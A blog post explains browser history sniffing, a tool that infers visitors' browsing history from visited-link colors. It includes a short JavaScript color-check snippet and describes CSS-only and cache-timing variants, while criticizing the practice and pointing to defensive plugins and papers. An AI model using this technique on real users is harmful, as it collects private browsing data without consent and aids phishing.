I found an interesting tool via Seobook.com. It exploits a “feature” of current browsers that do not properly partition persistent client-side state information (visited links and caching information) on a per site basis.
The tool can identify URLs in your visitor’s browsing history. Aaron suggests this be used to check if your visitors come from competing sites and adjust your marketing strategy accordingly.
This might not work as Aaron might expect. You can only tell that the visitor visited those URLs in the last n days (n the number of days the user keeps in his or her browsing history). You won’t be able to tell when, how often or how recently those URLs where visited.
While this is very useful for marketing purposes, the window for taking advantage of this for other purposes is huge. Collecting information on users without their consent doesn’t sound very good either.
Reader Dave comments:
I’ve always been conscious of the technical possibility of this and taken some safeguards against it. Still, as a user, I’d be furious if I knew this technique were being used on me, and I will be keeping my eye out for any precedent-setting legal challenges to this.
As a publisher/affiliate, I refuse to stoop this low. It’s disappointing but not unexpected that a great deal of readers here would be so sanguine about something so blatantly unethical.
Your user’s history object is none of your [edited] business.
Imagine a phisher that uses this to identify the on-line bank you use. With this information, his scam will be far more effective. Most people ignore emails from institutions they are not affiliated with.
Another reader pointed to a Firefox plug-in that solves the visited-link based attack problem. Here is another plug-in that prevents cache-based attacks. I installed both of them immediately.
The tool Aaron mentions exploits the visited-link vulnerability. Here is how it works:
Your browser, by default, colors visited links in a different color than normal ones. That information is available via CSS and client-side Javascript. The script works by pulling a list of target URLs, using Ajax (this happens with no user action), inspecting their color and flagging the ones that have the visited-link color — these are the ones the visitor has previously visited.
if (link.currentStyle) { var color = link.currentStyle.color; if (color == ‘#ff0000′) /* Here is the color inspection */ return true; return false; }
This is possible because our browsers don’t make sure the links flagged as visited are not in a page in the same domain of the link. It is very likely this will be fixed in future browser releases.
It might seem that disabling Javascript solves the problem, but this trick can be done as well with CSS only. Check https://www.indiana.edu/~phishing/browser-recon
Another form of attack, not used by the tool, is measuring the time the browser takes to open target URLs. URLs that have been visited are generally cached and load faster. Comparing timing information one can tell if a page was visited or not.
The plug-ins mentioned above protect from both types of attacks.
For more information visit: http://crypto.stanford.edu/sameorigin/
See also this papers for more background information:
Protecting browser state from web privacy attacks
Invasive browser sniffing and counter measures
Timing attacks on web privacy
Ramon Gallardo C.
June 4, 2007 at 3:20 am
Excellent post! I totally agree, this goes far beyond obtaining user information, it's right up there with invasion on privacy!!